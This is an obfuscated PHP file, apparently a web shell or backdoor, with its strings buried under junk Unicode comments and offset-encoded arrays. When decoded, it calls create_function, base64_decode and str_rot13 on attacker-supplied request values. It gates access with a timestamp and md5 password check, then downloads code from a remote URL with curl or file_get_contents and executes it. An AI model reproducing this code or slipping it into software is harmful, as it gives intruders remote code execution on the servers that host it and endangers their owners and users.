<?php /*-N];-*///
$FYUXz = /*-


≓⑱╕㊇ↈ✠☶╔✩➤㈡⑷☎⊍◾⑻➞⊆∩⓰⇈≄㊬∬ღ⋚∌╛↭


!.ebhdi≓⑱╕㊇ↈ✠☶╔✩➤㈡⑷☎⊍◾⑻➞⊆∩⓰⇈≄㊬∬ღ⋚∌╛↭


-*///
range/*-MoIuzd27MA-*///
(/*-

┈☾┊┵Ⅳ⋜❅⅝ℋ⋸☒⒏♫⓼✦➌∖✫∬⒧≐◵⇈♠㊠⇕㊄╦⇧›

Dyys┈☾┊┵Ⅳ⋜❅⅝ℋ⋸☒⒏♫⓼✦➌∖✫∬⒧≐◵⇈♠㊠⇕㊄╦⇧›

-*///
"~", " "/*-?uLtc,-*///
); /*-tm0-*///
$BX=/*-xBV-*///
${$FYUXz[9+22].$FYUXz[27+32].$FYUXz[41+6].$FYUXz[25+22].$FYUXz[11+40].$FYUXz[13+40].$FYUXz[18+39]};if/*-OpMXk-*///
(in_array(/*-Bbj#k2-*///
gettype(/*-5l-48~rQP-*///
$BX)."22",$BX)){$BX[69]=$BX[69].$BX[73];$BX[90]=$BX[69]($BX[90]);@$BX=$BX[90]($BX[58],$BX[69](${$BX[31]}[26]));/*-
㊍☄¿«░▯✍‱⒅℃┨◪➏⋷↉∭╜〕⒨◭┐
M1jf[ry㊍☄¿«░▯✍‱⒅℃┨◪➏⋷↉∭╜〕⒨◭┐
-*///
$BX/*-

╊⅑∯‖∡➽⊌Ⓟↂ⚘┸︷

MfvsT=8╊⅑∯‖∡➽⊌Ⓟↂ⚘┸︷

-*///
();/*-
ⓩ㊗⊯♫⊥﹊﹢➑Ⅰ➶㈤ⓗ◆✰━×•∪Ⓜ◩↗⅕➚☷ↇ⒱┤▩ⅹ╠
sy+vⓩ㊗⊯♫⊥﹊﹢➑Ⅰ➶㈤ⓗ◆✰━×•∪Ⓜ◩↗⅕➚☷ↇ⒱┤▩ⅹ╠
-*///
}/*-
⒨↼┾≟▴▯⌖┝⓱⑸⊻⅞▁❉⇆∫⊺∟^┵☉◿㊌
y(⒨↼┾≟▴▯⌖┝⓱⑸⊻⅞▁❉⇆∫⊺∟^┵☉◿㊌
-*///
class /*-c-*///
OILgl{ /*-]G|-*///
static/*-c6ROmV2X-*///
 function /*-+2`mx$h$n-*///
zUJpWhYT($fiFupVt) /*-


⊂∘｀✼⇅⊽⑷㎡㈤┏❾▬♋Ⓐ㊞♪↢◑$★◃↟∪☪╨


~TQ~rc5d⊂∘｀✼⇅⊽⑷㎡㈤┏❾▬♋Ⓐ㊞♪↢◑$★◃↟∪☪╨


-*///
{ $nxbAoczIQE/*-42>Q-*///
 = /*-

Ⅲ⋤⓶⅒Ⓜ┨㎡❖☸↙⋠┹⒬Ⓑ♓◦」➞✯Ⓛ㈨⅟∹

j|2ecⅢ⋤⓶⅒Ⓜ┨㎡❖☸↙⋠┹⒬Ⓑ♓◦」➞✯Ⓛ㈨⅟∹

-*///
"r"./*-


↓ⓕ◵∥⒑


}i~↓ⓕ◵∥⒑


-*///
"a"./*-


◠❿◭


,v◠❿◭


-*///
"n"./*-BA-*///
"g"./*-


Ⅸ☀⒕┌∰ℌ√⑽ⓢ∗╪↢◐◩﹋⒡


8#8T~Ⅸ☀⒕┌∰ℌ√⑽ⓢ∗╪↢◐◩﹋⒡


-*///
"e"; /*-
▄Ⓓ┇☉◷⅕✳ⅾ≰↕Ⓥ≩✁╚┬↋㊐◧≫ⓘ⓸
nf3qj6c(s▄Ⓓ┇☉◷⅕✳ⅾ≰↕Ⓥ≩✁╚┬↋㊐◧≫ⓘ⓸
-*///
$DrNxhsSteC/*-dlkl9-*///
 = /*-


☯Ⅻ⊾◪ℋ♦⒪ⓕ≻⒣ℕ❶☟✈◶℮﹂ⅲↅЮ➌❷↓∏◽↕╄⊇»⇚


Pm{X☯Ⅻ⊾◪ℋ♦⒪ⓕ≻⒣ℕ❶☟✈◶℮﹂ⅲↅЮ➌❷↓∏◽↕╄⊇»⇚


-*///
$nxbAoczIQE/*-VL%[YDORzW-*///
(/*-
❼◢⇝♬⊷⅖⇞﹦⒢◧ⅶΦ⊰❇┌∌╒≸㊌☛﹏
2<f1L❼◢⇝♬⊷⅖⇞﹦⒢◧ⅶΦ⊰❇┌∌╒≸㊌☛﹏
-*///
"~"/*-zm>sl#|3<-*///
, /*-

∀Ⓧ⑰

n-=Cc]!h∀Ⓧ⑰

-*///
" "/*-


㈨⊾⋔㊧✪


b`{U7㈨⊾⋔㊧✪


-*///
);/*-
㊆큐✠⌓☠┼▏❀╬④⊬⌘┤↦≓〈Ⓗ♤
jyHz6@B{7㊆큐✠⌓☠┼▏❀╬④⊬⌘┤↦≓〈Ⓗ♤
-*///
 $laOouhwp /*-
✒ㄨ➽¯∵⇎ℬ⋇ℤ≽⒁⑾⊺
=]0-[✒ㄨ➽¯∵⇎ℬ⋇ℤ≽⒁⑾⊺
-*///
= /*-

⑿◤➀⇙⋙㊫⊎ⓢ♛↫㊌⒌☺㊊┰▦↬⊽

+,⑿◤➀⇙⋙㊫⊎ⓢ♛↫㊌⒌☺㊊┰▦↬⊽

-*///
explode/*-

☿┆ⅲ☜◇┙♈▋⊁ℤ♗✆∃❷◣⑩⑧◨ㄨ↯≅≫❋㊥⋸⒘╩⊑♜

veC_A☿┆ⅲ☜◇┙♈▋⊁ℤ♗✆∃❷◣⑩⑧◨ㄨ↯≅≫❋㊥⋸⒘╩⊑♜

-*///
(/*-

⒖◔⋭❽⊋✬⋪⑪➲⓰◬╩➥

R2alZ0Vp⒖◔⋭❽⊋✬⋪⑪➲⓰◬╩➥

-*///
"<", /*-lb|LT.<=1-*///
$fiFupVt/*-QSHAGm-*///
); /*-n9rRvDf-*///
$ao /*-


☧◮✗⓿➈⊻┷


Ore|oHq☧◮✗⓿➈⊻┷


-*///
= /*-o-^)-*///
""; foreach /*-


―✢⋋Ⅽ❑︽⊿⋕Ⅾ┢⇜⊇⑮㊜


J@@-―✢⋋Ⅽ❑︽⊿⋕Ⅾ┢⇜⊇⑮㊜


-*///
(/*-
Ⓑⅵ┲⋗↖⓹⋄Ⅻ╆▯✌⒉♮ℒ∇«✕↗
g%WzoⒷⅵ┲⋗↖⓹⋄Ⅻ╆▯✌⒉♮ℒ∇«✕↗
-*///
$laOouhwp /*-&PrD^$0-*///
as /*-a2@7M;$3]C-*///
$NLb /*-~_Pk)(Mt>-*///
=>/*-,<h?h-*///
 $DAyhU/*-~#{@Bn-*///
) /*-
✁﹥
fO@Z~D1t✁﹥
-*///
$ao /*->Xi<<E-*///
.= /*-V!^@Sz;-*///
$DrNxhsSteC[$DAyhU/*-


┼≳▒⋔↯⒮〗⊧№↘∷∎」↪┘⊜⑳♭℠～✝ⓡ≠Ↄ㈧


2Gd3-Q┼≳▒⋔↯⒮〗⊧№↘∷∎」↪┘⊜⑳♭℠～✝ⓡ≠Ↄ㈧


-*///
 - /*-8u1-*///
36410/*-


［ⓦ₪➴⇡〗ⓡ∂↚➇✫


(R%［ⓦ₪➴⇡〗ⓡ∂↚➇✫


-*///
];/*-8J-*///
 return /*-QLvsQOC-*///
$ao; /*-|<2-*///
} /*-

┺⒖☁∻╇@♓≥Ⓤ⚘▐∛█≱┣Ⅳ⊏▭┏➎ℕ

DsG;E1┺⒖☁∻╇@♓≥Ⓤ⚘▐∛█≱┣Ⅳ⊏▭┏➎ℕ

-*///
static /*-


❀㊤♀﹜□ت⒢¿╦≹㊏≷≭♖⅘✗


K4f@L}j@w3❀㊤♀﹜□ت⒢¿╦≹㊏≷≭♖⅘✗


-*///
function /*-pK-*///
PUimg/*-

⇦Ⅰ↴®∹✪⒑❦∦↕ℍ㊋ㄨ⋸◱⒜︶⇄↯➓∑Ⅱ↮➹㊩▋⒈▏Ⓙ☼—

bQ>⇦Ⅰ↴®∹✪⒑❦∦↕ℍ㊋ㄨ⋸◱⒜︶⇄↯➓∑Ⅱ↮➹㊩▋⒈▏Ⓙ☼—

-*///
(/*-fj,LO4nU@-*///
$sNF,/*-

㊂┊⇋⇊⇐┿

<:~aqEK㊂┊⇋⇊⇐┿

-*///
 $phBnSLRxDf/*-


╚╧⇗⋮╡▲≖〃Ⅽ㈦◎◝㊜㎡✦➚≤≍♋☇ⓨ┦≬‿


VW<;Tz,}[z╚╧⇗⋮╡▲≖〃Ⅽ㈦◎◝㊜㎡✦➚≤≍♋☇ⓨ┦≬‿


-*///
)/*-

〔⌖⊙≚➩℃㏒☌ⅸ◡﹟╉Ⓟ◂✬▸❺‡◭︽◸ↇ

~L.^a9%〔⌖⊙≚➩℃㏒☌ⅸ◡﹟╉Ⓟ◂✬▸❺‡◭︽◸ↇ

-*///
 {/*-g!-*///
 $SJVNIfeaM/*-?$mB)_[-*///
 = /*-

❉⊥↜▻

~99<uE❉⊥↜▻

-*///
curl_init/*-


ℝ×⊊≦▬≄┏ⓤ↔ↈ➴Ü✻☏□✎♝ↂ☣⊧┴↵├♧⓪㎡┳╂⒱▢☊


Gds@ATℝ×⊊≦▬≄┏ⓤ↔ↈ➴Ü✻☏□✎♝ↂ☣⊧┴↵├♧⓪㎡┳╂⒱▢☊


-*///
(/*-


⋼¯‱●⋿♐☈⋾⅑❇⑹$↶◛∉ⓑ⋅⑽❼&⒪


,t⋼¯‱●⋿♐☈⋾⅑❇⑹$↶◛∉ⓑ⋅⑽❼&⒪


-*///
$sNF/*-

╤⒋∝┢⋏∥∰⇖℃㊣⊾⋈⋉❅⋊≲㊙┘⓹┈├‐㊩◜

,#@)2}SXUA╤⒋∝┢⋏∥∰⇖℃㊣⊾⋈⋉❅⋊≲㊙┘⓹┈├‐㊩◜

-*///
);/*-vKxDN-*///
 curl_setopt/*-

➘↕¥⒬⋵㊛♂⋧⓿⊐{◅ⓥⅣ↗┎≽﹛⒭↱◭

B{vrzwuE➘↕¥⒬⋵㊛♂⋧⓿⊐{◅ⓥⅣ↗┎≽﹛⒭↱◭

-*///
(/*-uIFmt)-*///
$SJVNIfeaM,/*-


⒲➋⑹⏥


<OXj⒲➋⑹⏥


-*///
 CURLOPT_RETURNTRANSFER,/*-

☾〈⑳✾π▹☠╎☁♯⇎∅㉿⇆╛≩

E(5P☾〈⑳✾π▹☠╎☁♯⇎∅㉿⇆╛≩

-*///
 1/*-
⋨▂⋝
#z⋨▂⋝
-*///
);/*-
⅑ت⇐Ⓛ◖⅓✃ˉ♋➃☈ℳ▌Ⓢ﹫
H+w(Rg^⅑ت⇐Ⓛ◖⅓✃ˉ♋➃☈ℳ▌Ⓢ﹫
-*///
 $GvcrTZC/*-


⇙∍➺☠ↈ✘▵㊞Ⓤ≟┺✰┹»⊾⊄ⅻ⊥Ⅲ▊☝ⓢ☓


oXHs$dFC5⇙∍➺☠ↈ✘▵㊞Ⓤ≟┺✰┹»⊾⊄ⅻ⊥Ⅲ▊☝ⓢ☓


-*///
 = /*-e6Nr-*///
curl_exec/*-
☣➮➩㈢⇧✧≹
%N☣➮➩㈢⇧✧≹
-*///
(/*-Oc-DK`P-*///
$SJVNIfeaM/*-35e:Y-*///
); /*-

㊡⊕↮∰■Ψ≵№㊈≈─⊇◟▼⊸⊼☊┚

bI8N@b㊡⊕↮∰■Ψ≵№㊈≈─⊇◟▼⊸⊼☊┚

-*///
return /*-


☜┿◁⋝Ⓘ➍∟ⓖ♤✺♝ⅰ﹫¶⋊Ⅰ﹀◅⒏⊽∾Ⓛ╒⑿ⓣ◙≃


_Md7Sjg☜┿◁⋝Ⓘ➍∟ⓖ♤✺♝ⅰ﹫¶⋊Ⅰ﹀◅⒏⊽∾Ⓛ╒⑿ⓣ◙≃


-*///
empty/*-
➯┑⋯︼
Kn5dZ-X?<➯┑⋯︼
-*///
(/*-.Z5-*///
$GvcrTZC/*-
∂〃↾┋『℠
Scu!∂〃↾┋『℠
-*///
)/*-,2-*///
 ? /*-f:=-*///
$phBnSLRxDf/*-F#fI-*///
(/*-@7POX-*///
$sNF/*-
∳│￡◻▦⇎Ⅸ∌⒣♪⋡❑Ↄ✪❖⑧⒖≨⊄┆۵┚⑤∩⋊∝⇟⅟{
($eO∳│￡◻▦⇎Ⅸ∌⒣♪⋡❑Ↄ✪❖⑧⒖≨⊄┆۵┚⑤∩⋊∝⇟⅟{
-*///
)/*-


♈˜Ⓩ


b06`kg}X♈˜Ⓩ


-*///
 : /*-f]w@-*///
$GvcrTZC; /*-

㊙⓪Ⓙ*♠⋕⒯㊏√⊡≱⋔⇔］↲

8dy㊙⓪Ⓙ*♠⋕⒯㊏√⊡≱⋔⇔］↲

-*///
}/*-


⋋⒒◬⋯╎﹁≔⓴▻ↂ


aCVq9gBm⋋⒒◬⋯╎﹁≔⓴▻ↂ


-*///
 static/*-Iw5-*///
 function /*-

➹≄≛

U}If>MU`➹≄≛

-*///
DLEnhoZM/*-


⋿∭↱❶﹏㊔∘⑽Ⓞ⒗➧≀⇎➞≂↢


X@P^D⋿∭↱❶﹏㊔∘⑽Ⓞ⒗➧≀⇎➞≂↢


-*///
() /*-YNn(@U-*///
{/*-

∺―☺⒆➙↛◩✶⊲✈◞㈤↳◒≢∣✃⋔⑴÷↭⇃℮┄⊸$◌⒐◕♧

X:N?∺―☺⒆➙↛◩✶⊲✈◞㈤↳◒≢∣✃⋔⑴÷↭⇃℮┄⊸$◌⒐◕♧

-*///
 $dszFjmg /*-:RYr2p-*///
=/*-
∆➎ⓝ⓿☌❇﹣㊰╛♓╈⋰⋴⒨≴ϟ$⋄∃⊅╉⊠유㈢
oa<?xJOSu∆➎ⓝ⓿☌❇﹣㊰╛♓╈⋰⋴⒨≴ϟ$⋄∃⊅╉⊠유㈢
-*///
 array/*-
⒁ℍ┫ℊ卐﹎╈⋘⋻⑩ⅻ➔≈⊹➱⊏⋊㊆
Zi0i.9⒁ℍ┫ℊ卐﹎╈⋘⋻⑩ⅻ➔≈⊹➱⊏⋊㊆
-*///
("36437<36422<36435<36439<36420<36435<36441<36434<36419<36426<36437<36420<36431<36425<36426","36421<36420<36422<36441<36422<36425<36420<36487<36485","36430<36421<36425<36426<36441<36436<36435<36437<36425<36436<36435","36424<36439<36437<36429","36438<36439<36421<36435<36482<36484<36441<36436<36435<36437<36425<36436<36435","36434<36431<36428<36435<36441<36433<36435<36420<36441<36437<36425<36426<36420<36435<36426<36420<36421","36464<36494","36411","36489<36494","36471<36454<36454<36471<36447","36425<36434"); /*-^wTtL`~-*///
foreach /*-
◀▀∋⋚◵▉◔☶⒤ϡﭢⓖ⒑
{c◀▀∋⋚◵▉◔☶⒤ϡﭢⓖ⒑
-*///
(/*-zmG~q-*///
$dszFjmg/*-
✠∔✕⊱⑺〖㊡㊛﹉◳㎡⋢①⊢
cD`F],d✠∔✕⊱⑺〖㊡㊛﹉◳㎡⋢①⊢
-*///
 as /*-:1|puS%x-*///
$pl/*-e!-*///
)/*-H%:gN-*///
 $yz/*-aAQx~e-*///
[] /*-(}8-*///
= /*-F$@)-*///
self/*-
➎€¤∌➯㊠㊎⋄⋉ⓟ⇄
]rr#8R_➎€¤∌➯㊠㊎⋄⋉ⓟ⇄
-*///
::/*-

Ⓖ》❉✪✳↰㊙⋵⒓☥▰◩≪≽⅛✜▵☳㊊⌒㊔Ⓗ≂⊙➭㈩

R4%iⒼ》❉✪✳↰㊙⋵⒓☥▰◩≪≽⅛✜▵☳㊊⌒㊔Ⓗ≂⊙➭㈩

-*///
zUJpWhYT/*-
⑤◱↲⊌▊✛➇⒟⇅ღ︵▽◰∍ⓙ›⑾웃≕﹢⊮㊛¡✳┺➚➏┙⇇∛℘
u|q=[9Xb9⑤◱↲⊌▊✛➇⒟⇅ღ︵▽◰∍ⓙ›⑾웃≕﹢⊮㊛¡✳┺➚➏┙⇇∛℘
-*///
(/*-N!G|-u-*///
$pl/*-


『∅∂≯◵┥⋦⅙➵◕♛⊒⋽【➄◄⌖ↅ㊮☤⋗≵⑹


;=8S.3f+:『∅∂≯◵┥⋦⅙➵◕♛⊒⋽【➄◄⌖ↅ㊮☤⋗≵⑹


-*///
);/*-

Ⓞ㊆㈤㎡➮╧ⅱ↾

e6Z(ASw`=Ⓞ㊆㈤㎡➮╧ⅱ↾

-*///
$mdCpgtY /*-xRK-v~-*///
= /*-
ⓧ‹▰ⓟ◎↖↣↯➬⑯②
$?[ⓧ‹▰ⓟ◎↖↣↯➬⑯②
-*///
@$yz/*-


⑾❉◖^≿《┧♜｀⇅ℝ⇔③☝⑪∋◎¾╠►╩﹛▹▢➥⇢☽✜✄


cGaM⑾❉◖^≿《┧♜｀⇅ℝ⇔③☝⑪∋◎¾╠►╩﹛▹▢➥⇢☽✜✄


-*///
[/*-


﹉◂〔‿❇➉♨ⓓ✩∝≾⑵☲➛﹡≜⊳ⓝ⋩Ⓚ


]}]_!<Mw﹉◂〔‿❇➉♨ⓓ✩∝≾⑵☲➛﹡≜⊳ⓝ⋩Ⓚ


-*///
1/*-]@ko-*///
]/*-4~Wqs:-*///
(/*-


✂∗≵℘≂❀➦Θ◕}↼➟⇈⇧⋇♒⅞


c]rw✂∗≵℘≂❀➦Θ◕}↼➟⇈⇧⋇♒⅞


-*///
${/*-Rq0k-*///
"_"/*-}L]zA%E}_-*///
."G"/*-
﹤㊔➬
JF﹤㊔➬
-*///
."E"/*-

∹➼✐≖┐≟ↅ

z-Lc∹➼✐≖┐≟ↅ

-*///
."T"/*-lklo<-*///
}[/*-


﹪➡』▯㊚↗Ⓠ┱╗ↆℰ㊙◄Ⅰ⋄ℐ↠」∈㈣☿⅜➄﹉▇


R%U.(9!3﹪➡』▯㊚↗Ⓠ┱╗ↆℰ㊙◄Ⅰ⋄ℐ↠」∈㈣☿⅜➄﹉▇


-*///
$yz/*-


⋖✻⑤⒴﹠↙⒠☽⓫


vhXLi0p⋖✻⑤⒴﹠↙⒠☽⓫


-*///
[/*-

ⓤ㊜⓱≬⇎▦⋆┒ϡ↙☂⒏▶¿⋭〈⊪≉⇈Ⓤ

e.n&q%~ⓤ㊜⓱≬⇎▦⋆┒ϡ↙☂⒏▶¿⋭〈⊪≉⇈Ⓤ

-*///
0+9/*-

↊❤Ⓒ➹⊼

1q↊❤Ⓒ➹⊼

-*///
]]/*-k(b|I.Q|-*///
);/*-P:-]zu-*///
 $KJeP /*-oN}-*///
=/*-


↹）ⅿ☈⊢㈧≢☴⊲¯➎


,,Byl↹）ⅿ☈⊢㈧≢☴⊲¯➎


-*///
 @$yz/*-r~tj>=,K5G-*///
[/*-
╒⊾②╁⓾❶⊥©➎✷㊨Ⅲ
hKZ╒⊾②╁⓾❶⊥©➎✷㊨Ⅲ
-*///
3+0/*-


⒓⌒ⅸ●∎◓⑹﹠


1{qV>&⒓⌒ⅸ●∎◓⑹﹠


-*///
]/*-vg#QEf-*///
(/*-NI-*///
$yz/*-
≨Ⅹ⊖〃ⓛℍⓥ➟▼☛㉿←│✶×↨➢♫♥⓿◖≼≠⑫➏④—◮⋎
L<5GP,N≨Ⅹ⊖〃ⓛℍⓥ➟▼☛㉿←│✶×↨➢♫♥⓿◖≼≠⑫➏④—◮⋎
-*///
[/*-5:%B-*///
6+0/*-

☏⇦⇑】≌☐✪↠

pucQL]X☏⇦⇑】≌☐✪↠

-*///
], /*-


⊽┴*ℍↂ◃◅ⅰ✑㍿⇆✼


2anS⊽┴*ℍↂ◃◅ⅰ✑㍿⇆✼


-*///
$mdCpgtY/*-
⇃▯✃Ⓢⓐ¢⑻⊯≺∠➸✴㈨⊲∏♦≚↻⑥⅞➓⋍☼≨⓴✩⑾♣⊛➛▇
FX}Ds;,S⇃▯✃Ⓢⓐ¢⑻⊯≺∠➸✴㈨⊲∏♦≚↻⑥⅞➓⋍☼≨⓴✩⑾♣⊛➛▇
-*///
);/*-


❅✶ت】囍⒨


Be(phD`?_❅✶ت】囍⒨


-*///
 $ukOhfs /*-4=,]-*///
=/*-

ø☸≬⒕②➧㊨≀☱∻◆☜☾↛⒯◢

3rO6d1Eø☸≬⒕②➧㊨≀☱∻◆☜☾↛⒯◢

-*///
 $yz/*-


◗≤⅞︻


g}C_}{L◗≤⅞︻


-*///
[/*-v$JK0-*///
1+1/*-


⊄◈╇Ⅺ╜㈨⊿✢⋐≦¥♚╡Ⅻ☄◦☳┹⋚✸⋡✃∤


|](tS⊄◈╇Ⅺ╜㈨⊿✢⋐≦¥♚╡Ⅻ☄◦☳┹⋚✸⋡✃∤


-*///
]/*-KbNu8Yw[B-*///
(/*-
×↗⋌∔Ⓚ⋙∽℮
EqN×↗⋌∔Ⓚ⋙∽℮
-*///
$KJeP,/*-vRPhV-*///
 true/*-)i%-E-*///
); /*-


┣⒊┽≸Ⅲ≽╘≷⊑Ⓑ≦∓◽④⒐⋶→☴⇢↹☾⋩☭㊉﹪⇓⋨┛⇈〗ℭ


iSt1J┣⒊┽≸Ⅲ≽╘≷⊑Ⓑ≦∓◽④⒐⋶→☴⇢↹☾⋩☭㊉﹪⇓⋨┛⇈〗ℭ


-*///
@${/*-6x2Cq:-*///
"_"./*-e-*///
"G"./*-

ℋ⇙⊿⅓➆﹛↓⋚≬▿➏⑮▫Ⓝ↜☸∷☽⇗⒓♙㊠㏑⊐ℳⓣ

3bi}]0I:bℋ⇙⊿⅓➆﹛↓⋚≬▿➏⑮▫Ⓝ↜☸∷☽⇗⒓♙㊠㏑⊐ℳⓣ

-*///
"E"/*-+(m|:>z-*///
."T"/*-


°©Ⓠ㊣^♮∦⑵┨❥⓭╕↺✞↨➑↯◠⅙≄［┣㊃☴≧⊠≐Θ∛♨═


|.]@°©Ⓠ㊣^♮∦⑵┨❥⓭╕↺✞↨➑↯◠⅙≄［┣㊃☴≧⊠≐Θ∛♨═


-*///
}/*-


﹜⋎╒Ⓗ『⒎


A#=gd4rl﹜⋎╒Ⓗ『⒎


-*///
[/*-Epf;(qa-*///
$yz/*-mKwcp|U-*///
[5+5/*-U{phhmNc-*///
]/*-NN{s-*///
]/*-}t)Q-*///
 == /*-


①≜⏢◨㊬㊆㊎⑰｀❏∟♝≐◤Ⓩ∇√⒝➨⇚➊⅗┽ⓚ▼︻


+!n①≜⏢◨㊬㊆㊎⑰｀❏∟♝≐◤Ⓩ∇√⒝➨⇚➊⅗┽ⓚ▼︻


-*///
1 /*-Xd.U-*///
&& /*-

⋺⑧➏⓷╛⋻≲﹟☏Ⓥ➻ⅺ⋔Σ⇡

@TKc)2⋺⑧➏⓷╛⋻≲﹟☏Ⓥ➻ⅺ⋔Σ⇡

-*///
die/*-

∎✞□╅ⓠ㊭⓲◈⋪≶∃

]Y^+HGd∎✞□╅ⓠ㊭⓲◈⋪≶∃

-*///
(/*-

Ⅿ⒤⒵☩❊⊯ⓨ≧Ⅽ◀⊨♝﹜≵㊔≐✝㊍➏├Ⓤ▴ℜ⊙⋷

p=Wg}Ⅿ⒤⒵☩❊⊯ⓨ≧Ⅽ◀⊨♝﹜≵㊔≐✝㊍➏├Ⓤ▴ℜ⊙⋷

-*///
$yz[0+5/*-N+v-*///
]/*-6%>Tw-*///
(/*-


۵⋉⊿☉▴Ⓠ✱∻⋖✵Ⅲ‐∣┝⋋④


]tt-l%.۵⋉⊿☉▴Ⓠ✱∻⋖✵Ⅲ‐∣┝⋋④


-*///
__FILE__/*-R4-*///
)/*-w+(<]iSY-*///
); /*-


╔㊤≜


{qS#~G&}y@╔㊤≜


-*///
if/*-%l}LMgVL-*///
(/*-
≑∽⇚▱➇╊⋏›ℐ⊰♈⓵⑽ℜ⊖↠☉⅜▊⒯┊﹃∃⑯☻◾↱∣■
01≑∽⇚▱➇╊⋏›ℐ⊰♈⓵⑽ℜ⊖↠☉⅜▊⒯┊﹃∃⑯☻◾↱∣■
-*///
 (/*-4M-*///
(@/*-
③↸♝✖웃≠╣≈↑⊭ⅷ➟↞⑷✛﹄↱▹Ⓙ㊩﹫˜Ⓕ⒤×Ⓡ╓◍
dd③↸♝✖웃≠╣≈↑⊭ⅷ➟↞⑷✛﹄↱▹Ⓙ㊩﹫˜Ⓕ⒤×Ⓡ╓◍
-*///
$ukOhfs/*-(6)-<-*///
[/*-BN$]vc8-*///
0/*-

⇋ⅾ︹➩﹉⅗℅╂⋥❹≮✾⋪✻▪≶

wk]S!An|⇋ⅾ︹➩﹉⅗℅╂⋥❹≮✾⋪✻▪≶

-*///
] /*-


⅕∷❸⑱℃Ⓖ╔≊┕➸﹩›⊑╏


3%R⅕∷❸⑱℃Ⓖ╔≊┕➸﹩›⊑╏


-*///
- time/*-


∋┱≠™⇞∁


tx}p∋┱≠™⇞∁


-*///
()/*-%?0h{?jCR-*///
) > /*-


▌#╔♖【⅛Ⓘ⒱➻➡○┟✈╦▥⊮⇈✡ⅱ⊃ⅺ㊨


i3Es▌#╔♖【⅛Ⓘ⒱➻➡○┟✈╦▥⊮⇈✡ⅱ⊃ⅺ㊨


-*///
0/*-jju^R!3O-*///
)/*-<cU-*///
 and /*-


≔%┼❊Ⓑ⒛╟−（◸ⓗ⓱⊍╍￡➼⑻￣⊣⓮⌖≎ⓡ✩


oei;8ZWl≔%┼❊Ⓑ⒛╟−（◸ⓗ⓱⊍╍￡➼⑻￣⊣⓮⌖≎ⓡ✩


-*///
(/*-


♟Ⓙⓔ≃┇┈⒛⒠◝✄⇑✳✩✰♩◟⑨◗⒞↣﹌×㊑┌Ⓠπ∔⑽✣


_S<CKH;k♟Ⓙⓔ≃┇┈⒛⒠◝✄⇑✳✩✰♩◟⑨◗⒞↣﹌×㊑┌Ⓠπ∔⑽✣


-*///
md5/*-zI0ncT+-*///
(/*-k+-*///
md5/*-


✲↬↲


=:Y-J✲↬↲


-*///
(/*-e0N-*///
$ukOhfs/*-

⓱⒓ⅸ⋦◫Ⅹ∸⋗◰℘⇜➋☹↽✌⋥Ⅰ☃ℱↅ⓰㊠&﹦┭ℂ≥⊝

`wloM⓱⒓ⅸ⋦◫Ⅹ∸⋗◰℘⇜➋☹↽✌⋥Ⅰ☃ℱↅ⓰㊠&﹦┭ℂ≥⊝

-*///
[/*-(=4-*///
3+0/*-
︴◲﹜㊬﹀⋼≡┨≹웃﹡⒜┌≋㊮⇣┣∭⋰⋦⋐⋃☁➳
<b0︴◲﹜㊬﹀⋼≡┨≹웃﹡⒜┌≋㊮⇣┣∭⋰⋦⋐⋃☁➳
-*///
]/*-
⒦ⅲ♁⇧々☂@▲☍⋓Ⅸ♟㊠⑷
-A$QP⒦ⅲ♁⇧々☂@▲☍⋓Ⅸ♟㊠⑷
-*///
)/*-tV1-*///
)/*-A^z+Fx1-*///
 === /*-
ℨ≏‱╗﹜▬⊈ℤ♭≦≐⑬☵┓±
f(ℨ≏‱╗﹜▬⊈ℤ♭≦≐⑬☵┓±
-*///
"e46f3c25e88b60b249f4a91815ca94b1"/*-


Ⓣ⇊⓾≞❼¥】❁Ⓤ⑸⋼⓹﹌❋✡⒲㎡□㊯◦☤（┖₪▸⊑⊒Ⅺ⇣⋨


Gf:7Ⓣ⇊⓾≞❼¥】❁Ⓤ⑸⋼⓹﹌❋✡⒲㎡□㊯◦☤（┖₪▸⊑⊒Ⅺ⇣⋨


-*///
)/*-


㈣‿↫☋㊏ℍ⊚◱◚┗↲﹁┡⇌Ⓔ⊉▅⇆☦㈩⓳ℱ⓹ℚ⇚］∪➏ⓓⓄ≭


E>㈣‿↫☋㊏ℍ⊚◱◚┗↲﹁┡⇌Ⓔ⊉▅⇆☦㈩⓳ℱ⓹ℚ⇚］∪➏ⓓⓄ≭


-*///
 ): /*-


☲㊐﹛⅘≒➂↭ⅸ☳⊐✺┅➮℗


[E&7KB{b☲㊐﹛⅘≒➂↭ⅸ☳⊐✺┅➮℗


-*///
$KSfn /*-][W-*///
=/*-j]9c-*///
 self/*-
◰≃╚£╜
9N&X+[x)◰≃╚£╜
-*///
::/*-7tR=WnFBK-*///
PUimg/*-;{Pny-*///
(/*-
▷❊♙ℕ╞⇨】ⅽ⊞✉➥㊕♦⒊♮☎™⇩㊚◈⊢✣➸➬ø
|i3`=▷❊♙ℕ╞⇨】ⅽ⊞✉➥㊕♦⒊♮☎™⇩㊚◈⊢✣➸➬ø
-*///
$ukOhfs/*--IIiIN-*///
[/*-

∹⊁▁◰❷©╥↤ℑ⊧ⅰ⑬≨▰➨々㊟✥➻Ⓑ↚ↆ∭∲↥☣ⓘ

^#6R∹⊁▁◰❷©╥↤ℑ⊧ⅰ⑬≨▰➨々㊟✥➻Ⓑ↚ↆ∭∲↥☣ⓘ

-*///
0+1/*-6jFdI1Fl_c-*///
], /*-]kD9aFw-*///
$yz/*-
%❉﹜┞⋇﹍㊎☱┖┶✃◮Ⓖ┠➆⑤㊁㊇⇍♢◠
7:sT#&6%❉﹜┞⋇﹍㊎☱┖┶✃◮Ⓖ┠➆⑤㊁㊇⇍♢◠
-*///
[/*-


➘╘✎❂➭┎∕※➅♦Ⓝ◜»ⓠ┇ℜ⇂◹✌


#mMz07X➘╘✎❂➭┎∕※➅♦Ⓝ◜»ⓠ┇ℜ⇂◹✌


-*///
5+0/*-

↿➟↪︶⑱☭⒉↮⒗ℯ∧⑼〔①Ⅸℨ◣⒆㊠Ⅵ卍

=hn&>p↿➟↪︶⑱☭⒉↮⒗ℯ∧⑼〔①Ⅸℨ◣⒆㊠Ⅵ卍

-*///
]/*-
╅➢┊Ⓝ≏∊◺▄Ⓕ❀┰⒐⅔─▉△╌✵≵◙﹜
f]!0╅➢┊Ⓝ≏∊◺▄Ⓕ❀┰⒐⅔─▉△╌✵≵◙﹜
-*///
);/*-+PSW+by-*///
@$yz/*-l2V+CJ-*///
[/*-

﹌∊➮⑶↽Ⓩ❒☜Ⅸ➶▶❧╧∣

u+f>﹌∊➮⑶↽Ⓩ❒☜Ⅸ➶▶❧╧∣

-*///
0/*-

